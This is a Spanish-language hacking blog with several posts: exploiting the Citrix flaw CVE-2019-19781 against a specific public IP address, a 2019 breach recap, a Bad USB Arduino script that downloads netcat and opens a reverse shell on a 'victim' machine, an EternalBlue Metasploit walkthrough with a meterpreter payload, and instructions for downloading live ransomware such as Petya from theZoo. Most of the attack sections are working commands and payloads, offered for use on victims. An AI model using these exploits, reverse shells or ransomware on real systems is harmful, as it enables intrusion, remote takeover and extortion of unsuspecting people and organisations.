domingo, 26 de enero de 2020

Explotando CVE-2019-19781 - Citrix Netscaler Gateway


Hola fieles lectores en esta oportunidad les enseñare a encontrar vulnerabilidades en los servicios de Citrix Netscaler Gateway y posteriormente elaborar pruebas de pentesting.

Citrix Netscaler Gateway

Es una aplicacion de acceso de datos seguro para los administradores mediante mecanismos de identificacion y autentificacion.

Este servicio cuenta con servicios de seguridad DMZ, IDS y un tipo de certificado criptografico PKCS que usa para agrupar una clave privada con su certificado X.509 o para agrupar a todos los miembros de una cadena de confianza y poder ejecutar los aplicativos de una organización mediante la conectividad VPN.



Versiones vulnerables:

10.5, 11.1, 12.0, 12.1, y 13.0

Consecuencia:

Ejecución de comandos remotamente.

  • /vpns/
  • /vpn/../vpns/cfg/smb.conf
  • /vpn/../vpns/portal/scripts/newbm.pl

El ataque tuvo un imparto de más de 80 000 mil empresas vulneradas a nivel mundial.

más información:
https://support.citrix.com/article/CTX267027

Encontrando servidores citrix vulnerables

Shodan es un buen aliado para encontrar servicios vulnerables de todo tipo, desde diciembre incorporo el escaneo de vulnerabilidades CVE-2019-19781.
Dorks:

title:"Netscaler" country:"IT"
title:"Netscaler" port:"443"

Si deseas aprender SHODAN, puedes entrar a los siguientes articulos.
https://www.backtrack-omar.com/2015/02/shodan-el-buscador-del-informatico-de.html
https://www.backtrack-omar.com/2016/11/pentesting-con-shodan-exploits.html




https://www.shodan.io/host/92.246.226.211


Nmap - El escaner de redes más potente y utilizado del mundo no se podría quedar atrás, ya cuenta con un modulo (Script) para detectar la vulnerabilidad CVE-2019-19781.
https://github.com/cyberstruggle/DeltaGroup/blob/master/CVE-2019-19781/CVE-2019-19781.nse

Si deseas aprender a utilizar NMAP y Masscan para un escaneo masivo te invito a leer los siguientes articulos.
https://www.backtrack-omar.com/2014/04/aprendiendo-nmap-nivel-basico.html
https://www.backtrack-omar.com/2015/10/comprometiendo-sistemas-nivel-mundial.html
root@kali:/usr/share/nmap# nmap --script CVE-2019-19781.nse -Pn -v 92.246.226.211 -p 433



Metasploit Framework nuestro framework de pentesting preferido también incorporo su escaner de vulnerabilidades correspondiente.

Configuración de opciones:

msf5 > use exploit/linux/http/citrix_dir_traversal_rce
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RHOSTS 92.246.226.211
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set RPORT 433
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set SSL yes
msf5 exploit(linux/http/citrix_dir_traversal_rce) > set lhost 192.168.0.150
msf5 exploit(linux/http/citrix_dir_traversal_rce) > run

Resultado:

PoC

Exploit:
https://github.com/projectzeroindia/CVE-2019-19781/blob/master/CVE-2019-19781.sh
root@kali:~/Exploits/CVE-2019-19781# bash CVE-2019-19781.sh 92.246.226.211 ls

Este exploit nos permite ejecutar comandos de manera remota en el servidor, no obstante debemos tener en cuenta de modificar los permisos y peticiones de nuestros archivos de configuración de citrix para denegar peticiones maliciosas.
Citrix ya publico la manera de fixear esta vulnerabilidad:

Experiencia propia como consultar de seguridad informatica.


Hacemos 3 años trabaje en un Call center de una empresa tercerista de Movistar  y a lo largo de este proceso encontré muchas debilidades pero solo mencionare lo referente a CITRIX

Citrix: Servicio de VPN privado a la red Movistar

ATIS: Es el aplicativo de consultas que brinda el servicio de telefónica, para obtener la información de los clientes en cuanto a sus servicios de cable, telefonía e internet.

Observación: como encargado del área de sistemas, se deben cumplir algunos requisitos de instalaciones y licencias en las maquinas para que estas puedan ser actas para contratar el servicio de instalación, entre ellos los datos del trabajador se recopilan de igual manera.

Antes de generarse el contrato correspondiente, se ejecutan 2 herramientas en la maquina donde se instalo el software de telefónica.

Estas recopilan las informaciones correspondientes:

Importante: Las estaciones de trabajo no deben tener instalado en ningún momento software no permitido, tales como: programas de acceso remoto.  Se realiza verificación en estaciones configuradas.

Cabe aclarar que esas informaciones correspondientes la guardan en su NUBE, sin avisar o establecerlo en el contrato.

Estos datos se pueden obtener en un archivo temporal que se crea en un documento de texto y es enviando al servidor central, al igual que perifericos, versión de componentes de hardware y demas datos computacionales del dispositivo que se ejecutara la instalación.

Las firmas electrónicas hoy en día son esenciales para autentificar y validad los accesos a sitios con restricción de certificado, por otra parte, la criptografía juega un papel importante para proteger la comunicación y el cifrado del documento en si, por otra parte, cumple un estándar de calidad ligado a la seguridad de la información.

Este último nos permitirá una comunicación privada flexible a un servidor dedicado, para ello movistar registra los siguientes datos donde se instaló el software.
Panel de las aplicaciones de Telefonica
Moraleja si esa vulnerabilidad CVE-2019-19781 hubiera alcanzado las empresas con datos de millones de personas, la fuga de información hubiese sido tremenda!

Saludos.

sábado, 25 de enero de 2020

Los hackeos significativos en el 2019



Hola estimados fieles lectores, es un placer dirigirme a ustedes luego de 3 años de ausencia, quisiera pedirle disculpas por mi inactividad repentina y agradecer por su fiel visita a mi blog, con medio millón de vistas.

Este 2019 nos trajo muchas sorpresas respecto a los ataques informáticos, por medio de Malwares, APT, Information Leak, SQL Injection y CVE 0 Days.

Redes Sociales

Las redes de comunicación vitales hoy en día, y gracias a estos portales "Nuestros datos son procesados" para empresas o gobiernos con el único objetivo estudiar nuestro comportamiento y tenernos vigilados en nuestras actividades rutinarias.

Entonces tenemos la otra cara de la moneda, si nuestra información es vulnerada por terceros ¿Que pasaría?

  • Suplantación de identidad
  • Extorsiones 
  • Robo de credenciales
  • Mercado negro
  • Espionaje
Facebook
Marzo:  

Las credenciales de facebook y instagram (Servicio ligado a la red principal) fue vulnerado por una mala gestión de almacenamiento y millones de usuarios fueron victimas de fuga de información.

Abril:


540 millones de credenciales, incluyendo los datos sensibles de los usuarios fueron expuestos por una mala administración de seguridad de la información, valga la redundancia los representantes de esta organización aceptaron que los datos estaban en texto plano.

en meses posteriores nos enteramos que facebook otorgo aplicaciones a mas de 100 "desarrolladores" para obtener información sensible de algunos perfiles de los usuarios, esto tuvo como consecuencia extorsiones.

Todos sabemos que facebook vente nuestra información y eso es lo que genera los activos en la compañia.

Les dejo un video del CEO Mark Zuckerberg testificando ante el Senado de Estados Unidos por el escándalo de Cambridge.



Outlook

Enero:

A inicios de ese año se comprometieron cuentas de personal de soporte y por consecuente la fuga de información de más de un millón de usuarios, dando como resultado correos, carpetas personales y direcciones de emails al ojo de los cibercriminales, la empresa Microsoft tuvo que elaborar una extensiva auditoría en los registros de accesos y bloquear a los usuarios afectados por su seguridad.

Los delincuentes utilizaron este mecanismo de ataque para restablecer alguno servicios ligados a esos correos para realizar extorsiones, envíos de malwares y venta de datos en los mercados negros conocidos.

WhatsApp

MAYO:

Whatsapp fue vulnerado por la compañía NSO Group que descubrió la vulnerabilidad CVE-2019-3568 Consistía en que un hacker podía instalar malware en cualquier móvil con sólo hacer una llamada de voz a través de WhatsApp, este tipo de ataque dirigido fue centrado a personas de alto rango como, miembros del gobierno, diputados, periodistas, etc. Hasta el presente mes solo se supo que 1400 cuentas fueron comprometidas, mientras tanto NSO Group se defiende que utilizo este ataque para proteger a los usuarios de la amenaza presente.

Antes de culminar con esta categoría no podía olvidarme de la famosa aplicación móvil  "FaceAPP"







Este aplicación fue creado por un desarrollador ruso llamado "Yaroslav Goncharov", esta app fue liberada gratuitamente para que los cibernautas  se tomen una selfie y puedan virtualizar como serian de adultos.
(Una herramienta que parece de estar percibido y si ningún perjuicio)

¿Porque se origino molestia en la comunidad de seguridad informática?

Pues es simple, esta app utiliza nuestra información personal incluida nuestras fotos que son tecnologicamente almacenadas para el uso de reconocimiento facial, utilizando la tecnológicas de redes neuronales la información viaja por varios canales de red para validad la información de los usuarios.

Si esta aplicación vendiera nuestra información a gobiernos o la misma NSA o otro estado de seguridad nacional como China o Rusia, seriamos identificados en cualquier parte del mundo o algo peor que su base de datos fuera vulnerada por terroristas.

Pruebas de como los datos vulnerados pueden ser vendidos en algunos mercados negros en los servicios .ONION (Deep Web)


Plataformas de Exchange

Si bien es cierto los Exchange son sitios de divisas de criptomonedas que  son utilizadas por los Trading y en esta categoría enumerare quienes fueron las compañias afectadas y sus perdidas millonarias.
  •     CoinBene - 105M USD
  •     Upbit - 49M USD
  •     Binance - 40M USD
  •     BitPoint - 32M USD
  •     Bithumb - 18.7M
  •     Cryptopia  - 16M USD
  •     DragonEx  - 7.09M USD

Sistemas Bancarios 


En este punto llegamos a una categoría económica donde millones de clientes pueden verse afectados o el mismo banco por incumplir con las políticas de privacidad y pagar millones de dolares por infracción.


Banco Capital One

Paige Thompson, de 33 años octuvo acceso a 100 millones de cuentas de crédito de personas de EE.UU y 6 millones en Canada, hasta el momento se sabe que la hacker Paige burlo un Firewall en la capa 7 del sitio web y tuvo acceso a los servidores web por medio de una vulnerabilidad en el servidor principal a principios de marzo.


Banco de las Islas Caimán

Este ataque se le atribuye al conocido "Hacker" Phineas Fisher vulnerando algunas cuentas bancarias de  La Isla de Man, Chipre, Islas Vírgenes, Seychelles, Belice, Estados Unidos, Reino Unido, Irlanda, etc.

Bancos mexicanos

Los cajeros automáticos seleccionados habían sido infectados previamente con un virus para que en determinada hora y día se retirasen de 30 a 60 mil pesos por cajero, mediante un ataque al servicio SPEI, variante del método era encontrar la vulnerabilidad en los sistemas bancarios para seleccionar cajeros automáticos de los que se extraían de 100 a 200 millones en una sola operación.

En su mayoría los grupos delictivos envían los fondos de las victimas a plataformas para lavar los activos, mediante Exchange - "Bitcoins", compran en sitios en linea conocidos a nivel mundial y envian los productos a su comprador por un precio de 40% menos de lo que cuesta o venden las tarjetas como acabamos de ver en la imagen anterior.

Rasomware

Hasta 174 ciudades fueron víctimas de este tipo de ‘malware’ a lo largo del año. Kaspersky desvela que, aunque tienen menos capacidad para pagar los rescates, son más propensas a aceptar las pretensiones de los ciberdelincuentes.A lo largo de 2019, un total de 174 municipios, con más de 3 000 organizaciones subsidiarias, fueron víctimas de ataques de ransomware.

Durante 2019 las tres familias de ransomware más predominantes fueron Ryuk, Purga y Stop. España concentró un 1,84 % de todos los afectados por Ryuk en el mundo, Purga representó el 0,18 % y Stop, el 0,65 %.

Ryuk $ 3,701,893.98 USD.

 Purga 1,610,093.98 USD.



STOP 1,031,00.18 USD.


Entre otras amenazas que se vieron como INTEL, Android (Proyecto Zero), CISCO, WPA2, iOS, Linux, etc que permitieron que algunos de los ataques mencionados tuvieran éxito, como no recordar el año 2017 cuando EternalBlue atacaba los servidor SMB vulnerables y se elaboro el ataque de malware masivo infectando millones de ordenadores con el ransomware "Wannacry".

Si bien es cierto estimadores lectores, la unica manera de estar expuestos a estos ataques es no conectarte a internet (Lo que una persona normal pensaría) como un agente de seguridad informática, las empresas deben estar a un paso adelante de estos ataques, elaborar mecanismos de contingencia ante cualquier amenaza vigente mediante el proceso de Hardenning a nivel de las 7 capas existentes y la humana(Para evitar ataques de ingenieria social).
En el estándar internacional ISO 27001 tenemos los Dominios Tecnológicos de Seguridad incorporan los activos de la información que van a proteger y cumplir las buenas practicas de estandarización en nuestra organización.
  • Seguridad Logica
  • Seguridad Fisica 
  • Seguridad Organizativa
  • Seguridad Legal
Tengan en cuenta que en este mundo de las tecnologías de información las amenazas se clasifican, controlan y supervisan constantemente.
"No existe una cura, cuando no se prueba el veneno"

Espero que les haya gustado este articulo, los espero en el proximo post.
Un saludo.

lunes, 20 de enero de 2020

Penetration Testing con Bad USB

Hola estimados fieles lectores un placer nuevamente estar con ustedes luego de 3 años. En esta oportunidad les enseñare a crear sus propios Scripts para su dispositivo de Hackeo BAD USB(rubber ducky)

¿Que es Bad USB?

Bad USB es un dispositivo USB que se comporta como otro dispositivo de teclado automatizado, que permite utilizar este dispositivo de manera maliciosa para ataques de pentesting de manera local.

Características:

Microcontroller: ATmega32u4
Clock Speed: 16 MHz
Operating Voltage: 5V DC
Digital I/O Pins: 10
PWM Channels: 4
Analog Input Channels: 5
UART: 1
I2C: 1
Micro USB: 1
Flash Memory: 32 KB of which 4KB used by bootloader
SRAM: 2.5 KB
EEPROM: 1 KB

USB ATMEGA32U4 Development Board Module For Arduino Leonardo R3

Este dispositivo se puso de "moda" en el año 2014 y hasta el día de hoy se sigue utilizando por su eficacia.

Existe un gran demanda de estos dispositivos en varias plataformas de e commerce a nivel mundial. 


A continuación vamos a descargar el IDE Arduino.
(Dependiendo su sistema y arquitectura)





Instalación:

tar -Jxf arduino-1.8.9-linux64.tar.xz 
cd arduino-1.6.12/
./install.sh




Antes de comenzar a crear el script vamos a repasar un poco de arduino.

¿Qué es Arduino?

Arduino es una plataforma y, como tal, dispone de varios elementos: hardware, software y lenguaje de programación. Este libro pretende ampliar tu lenguaje de programación y, teniendo en cuenta la base que hemos visto, no necesitamos añadir más conceptos sobre electrónica y hardware, pero si sobre el IDE de Arduino.

Estructuras de control de flujo repetitivas

Este tipo de estructuras son también conocidas como «bucles»; se diferencian de las estructuras no repetitivas en que, siempre y cuando se cumpla la condición o condiciones, se ejecutan las líneas de código una y otra vez sin salir de la estructura

While

Esta estructura ejecuta las instrucciones que se encuentran entre sus llaves de apertura y cierre. ¿Cuántas veces? Se ejecutarán mientras la condición especificada se cumpla, sin ejecutarse ninguna otra línea de código que se encuentre fuera de la estructura.
while(condición)
{
//Instrucciones que se ejecutan mientras se cumpla la condición
}

Ejemplo:



Programando en Arduino 

Ejemplo 1:

Ejemplo 2:











Aprende arduino aquí:

Una ves instalado el IDE Arduino, ingresamos nuestro Bad USB y buscaremos nuestra placa para poder iniciar la compilación y depuración de nuestro proyecto.




Creando nuestro Backdoor con NC en Arduino IDE

Antes de empezar a explicar un poco el  código fuente debo aclarar que la victima tiene Linux Bash Shell instalado en su sistema y aprovechare esas características para acceder al sistema.






Explicando el código fuente:

----------------------------------------------------------------------------------------------------------------------

 Keyboard.begin();
// Waiting 500ms for init
  delay(500);

  delay(3000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press(114);
  Keyboard.releaseAll();
----------------------------------------------------------------------------------------------------------------------

Estamos indicando el dispositivo pulsee la tecla WINDOWS(KEY_LEFT_GUI) y dando Enter(144) en un tempo determinado de 3 segundos.

Algunas teclas expresiones de teclado:
  • KEY_LEFT_CTRL
  • KEY_LEFT_SHIFT
  • KEY_LEFT_ALT
  • KEY_LEFT_GUI
  • KEY_RIGHT_CTRL
  • KEY_RIGHT_SHIFT
  • KEY_RIGHT_ALT
  • KEY_RIGHT_GUI
  • KEY_UP_ARROW
  • KEY_DOWN_ARROW
  • KEY_LEFT_ARROW
  • KEY_RIGHT_ARROW
  • KEY_BACKSPACE
  • KEY_TAB
  • KEY_RETURN
  • KEY_ESC
  • KEY_INSERT
  • KEY_DELETE
  • KEY_PAGE_UP
  • KEY_PAGE_DOWN
  • KEY_HOME
  • KEY_END
  • KEY_CAPS_LOCK
  • KEY_F1
  • KEY_F2
  • KEY_F3
  • KEY_F4
  • KEY_F5
  • KEY_F6
  • KEY_F7
  • KEY_F8
  • KEY_F9
  • KEY_F10
  • KEY_F11
  • KEY_F12

Equivalencias de otras unidades de tiempo en milisegundos

  • Un centisegundo equivale a 10 milisegundos.
  • Un decisegundo equivale a 100 milisegundos.
  • Un segundo equivale a 1000 milisegundos.
  • Un minuto equivale a 60 000 milisegundos.
  • Una hora equivale a 3 600 000 milisegundos.
  • Un día equivale a 86 400 000 milisegundo
----------------------------------------------------------------------------------------------------------------------
 delay(500);
 Keyboard.print("cmd");
 delay(500);
 typeKey(KEY_RETURN);
 delay(500); 
 Keyboard.print("wget 192.168.0.4&nc64.exe");
 typeKey(KEY_RETURN); 
 delay(50);
 Keyboard.print("START nc64.exe 192.168.0.4 8888 /e cmd.exe /d & exit");
 typeKey(KEY_RETURN);  
 delay(500);
 Keyboard.print("exit");
 typeKey(KEY_RETURN);    
}
----------------------------------------------------------------------------------------------------------------------

Keyboard.print - Aquí añadiremos los valores que deseamos digitar de manera automatizada
typeKey(KEY_RETURN) - Boton Enter.

como podemos ver en el código anterior estoy indicando que descargue un ejecutable NC.exe con la dirección IP y el puerto de escucha de mi ordenador, una ves que se conecte me abrirá el CMD de nuestra victima.

Ejecutamos Netcat en nuestro ordenador para la conexión.
root@kali:~# nc -l -p 8888

Ahora ingresamos el USB en la PC de nuestra victima para realizar nuestra prueba de concepto.



Reverse Shell CMD


De manera automatizada hemos conseguido acceder al sistema de nuestra victima.
No obstante también pueden subir un backdoor .exe de msfvenom y listo.

Les dejo algunos scripts que pueden utilizar para sus pruebas de concepto:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

Existen herramientas que automatizan los payloads , pero quise hacer este articulo para que comprendas la estructura de un Payload en Arduino.

Saludos.


sábado, 31 de diciembre de 2016

MS17-010 EternalBlue - Remote Hacked Windows 7/8 64BITS Metasploit



Saludos mis queridos fieles lectores, luego de ver algunos mensajes de nuestros seguidores respecto al Exploit MS17-010 EternalBlue.

Si bien es cierto este Exploit fue publicado gracias a una fuga de información - "Leak".
Afecto a muchas empresas a nivel mundial aprovechando la vulnerabilidad SMB  en el puerto 445 para ejecutar códigos maliciosos remotamente, efectuando ataques APT'S mundiales como el ransomware "Wannacry" y "Petya"

En el anterior POST enseñe como puedes ejecutar este ransomware en el sistema de tu victima:
https://www.backtrackomar.com/2017/09/generando-payloads-con-chaos-framework.html

¿Como funciona Eternalblue?

EternalBlue aprovecha una vulnerabilidad en la implementación del protocolo Server Message Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar código en el ordenador en cuestión.

Referencia: https://es.wikipedia.org/wiki/EternalBlue

Comencemos 

El exploit se encuentra en los repertorios de msfconsole instalado, si no lo tienes actualizalo.

root@kali:/# apt update && apt upgrade && apt dist-upgrade 

Otra alternativa:

root@kali:/# msfupdate

Bueno lo primero que debes hacer tu como "Analizador" en un entorno real "Abrir los puertos de tu Router" o elaborarlo desde un VPS (Por su seguridad de identidad si el caso lo a merita)

En primer instancia haremos un escaneo en mi red local para encontrar los dispositivos conectados:

Nmap - Mapeando redes y verificando que puertos tienen abiertos:

root@kali:/# nmap 192.168.1.1/24 -O sU -sT


POST: https://www.backtrackomar.com/2014/04/aprendiendo-nmap-nivel-basico.html

Nuestro objetivo tiene el puerto 445 y por lo que nos indica Nmap corre Windows 7 por la cantidad de repeticiones.

Vamos a utilizar el script " de análisis vulnerabilidades de nmap para testear si es vulnerable.

root@kali:/# nmap --script smb-vuln-ms17-010.nse -p445  192.168.1.3

Genial, a continuación ejecutaremos msfconsole para la explotación remota, pero antes activen el servidor de base de datos.

root@kali:/# service postgresql start
root@kali:/# msfconsole 


Source:
-------------------------------------------------------------------------------------------------------------------------
msf > use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set RHOST 192.168.1.3
RHOST => 192.168.1.3
msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.33
lhost => 192.168.1.33

msf exploit(ms17_010_eternalblue) > exploit
--------------------------------------------------------------------------------------------------------------------------

Luego que se ejecute el código malicioso remotamente, hemos tenido la sesión meterpreter de nuestra victima:

El sistema esta completamente comprometido,  si deseas interactuar el S.O de la victima te dejo un articulo de hace años. se que te ayudara.


! Saludos !


domingo, 18 de diciembre de 2016

theZoo - Proyecto de análisis de Malware

Saludos mis queridos fieles lectores, en esta oportunidad les traigo TheZoo es un proyecto con muchos años de elaboración con el único fin de analizar los Malwares mas peligrosos y conocidos a nivel mundial.

Entre ellos tenemos: Wannacry, Petya, TeslaCrypt, Stuxnet, Zeus en casi todas sus versiones , Rat's, SpyEye entre muchos.

Binarios:





https://github.com/ytisf/theZoo/tree/master/malwares/Binaries

Común mente un analizador de malware mediante depuradores de código ensamblador como Ollydbg entre otros. ( Descompila un binario y puede ver los procesos y acciones  que se ejecutan en cada evento)

Payload camuflado en Raidcall.exe



theZoo también nos proporciona Malwares con sus respectivos códigos abiertos.

Códigos:




https://github.com/ytisf/theZoo/tree/master/malwares/Source/Original

Lo mas asombroso son los "Exploitkit" que en su momento valieron mucho dinero. entre ellos el rescata ble BlackHole


Una colección que sin duda es muy beneficiosa para los amantes de análisis de malware, pero  toda acción tiene reacción.

Por ejemplo subir los ransomware que son bastante perjudiciales en los ordenadores de las victimas ya sea por ataques remotos, Post-explotación o simplemente de manera manual en entornos físicos.
como por ejemplo el "Wannacry" o el "Petya"



Este servidor ha enseñado en artículos anteriores como ejecutar malware de manera remota por medio de RAT, Msfconsole o frameworks nuevos como Empire, pupy, chaos entre otros, que puedes encontrar en este humilde blog.

https://www.backtrackomar.com/search?q=metasploit
https://www.backtrackomar.com/search?q=framework


Bueno descargamos los repositorios e instalamos los requisitos correspondientes:

root@kali:~# git clone https://github.com/ytisf/theZoo/

root@kali:~# cd theZoo/
root@kali:~/theZoo# pip install -r requirements.txt 

Luego daremos permisos al aplicativo y lo ejecutaremos:

root@kali:~/theZoo# chmod +x theZoo.py 
root@kali:~/theZoo# python theZoo.py 

Podemos observar que nos sale un mensaje de alerta respecto a la peligrosidad de los archivos. nosotros le daremos Yes.




El entorno es bastante flexible para interactuar (Framework) comencemos.
vamos interactuando con comandos.

mdb #> help

 Available commands:

search              Search for malwares according to a filter, e.g 'search cpp worm'.
list all             Lists all available modules
use                 Selects a malware by ID
info                 Retreives information about malware
get                 Downloads selected malware
report-mal   Report a malware you found
update-db   Updates the databse
help                 Displays this help...
exit                 Exits...

Luego de leer las respectivas opciones, vamos a buscar un ransomware conocido el "Petya":

mdb #> search petya

Nuestra búsqueda fue correcta, en carácter # es su (ID) identificador que nos permite usarlo:

mdb #> use 165

Ahora utilizaremos get para descargar el binario & source.


mdb Petrwrap#> get

Hemos descargado varios archivos en la carpeta de raiz, el que nos interesa esta en formato ZIP (Donde se encuentra el binario)

Lo extraemos:

root@kali:~/theZoo# ls
root@kali:~/theZoo# unzip Ransomware.Petrwrap.zip 

Postdata: La contraseña de todos los archivos es: infected

Tú eres el ubico responsable: solo acuérdate algo "Toda acción, tiene su reacción."

Saludos y éxitos mi fiel lector, un fuerte abrazo desde Perú. 

Datos del Autor

Estudiante de Ingeniería de computación y sistemas en Perú.
actualmente me estoy dedicando a dar ponencias sobre seguridad Informática.
Soy una persona sencilla y humilde que me encanta aprender nuevos temas en mis tiempos libres.

"Me considero un novato en busca de conocimiento"


Entradas Populares